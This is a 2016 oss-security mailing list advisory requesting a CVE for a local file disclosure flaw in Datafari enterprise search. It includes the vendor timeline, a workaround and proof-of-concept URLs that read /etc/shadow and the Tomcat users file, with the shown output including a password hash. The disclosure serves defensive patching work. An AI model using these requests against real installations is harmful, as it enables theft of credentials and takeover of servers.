Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 3 Feb 2016 15:55:07 +0000
From: PASCAULT Wilfried <wpascault@...si.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE Request: Datafari Local File Disclosure

Datafari, an Open source enterprise search software using Apache Solr, ManifoldCF and Tomcat is proned to a local file disclosure vulnerability.

Product's information
---------------------
* Name : Datafari - http://www.datafari.com/
* Editor: France Labs
* Affected versions: 2.x<2.1.3
* Tested : 2.1.0 and 2.1.1 on Debian Wheezy 7 and Jesse 8

Description
-----------
When "filesystem" repository has been configured into Datafari (administrative privileges on Datafari required), a user could access to any file of the system with root privileges.

On "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" configuration file, "ALLOWLOCALFILEREADING" parameter allows by default to read file on system.

Datafari is by default running as user root, so any file could be downloaded with "url=file:/" parameter in "/Datafari/URL" (token isn't checked).

This issue is exploitable only when "Filesystem" repository has been set on ManifoldCF.

Proof of concept
----------------
http://localhost:8080/Datafari/URL?url=file:/arbitrary_file

http://localhost:8080/Datafari/URL?url=file:/etc/shadow
=> file will be downloaded as _etc_shadow

$ head _etc_shadow
root:$6$nTTh32TT$rLqcSGDf92tyh9aXtuTqnlGW4Ewr.IzBEcdP/kMnvhNYELz7iUgmOyiWesbJRUwEeKdKk/2yQcnAVBQYBGsiD.:16714:0:99999:7:::
daemon:*:16714:0:99999:7:::
bin:*:16714:0:99999:7:::
sys:*:16714:0:99999:7:::
sync:*:16714:0:99999:7:::
games:*:16714:0:99999:7:::
man:*:16714:0:99999:7:::
lp:*:16714:0:99999:7:::
mail:*:16714:0:99999:7:::
news:*:16714:0:99999:7:::

another funny file ^_^ (Tomcat manager password could not be changed during installation)
http://localhost:8080/Datafari/URL?url=file://opt/datafari/tomcat/conf/tomcat-users.xml
$ cat _opt_datafari_tomcat_conf_tomcat-users.xml|grep admin
  <user password="@...SWORD@" roles="manager-gui,SearchAdministrator" username="admin"/>

http://localhost:8080/manager/html/list


Workaround
----------
Set "ALLOWLOCALFILEREADING=false" on "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" and restart Datafari

Timeline
--------
1/6/2016: reported to vendor
1/11/2016: vendor response but said was not a security issue
1/11/2016: add technical details and POC
1/11/2016: vendor acknowledged as a security issue
1/11/2016: patch was commited in master branch
1/28/2016: 2.1.3 released

Thanks to Cédric and Aurélien from Datafari project for their quick replies.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ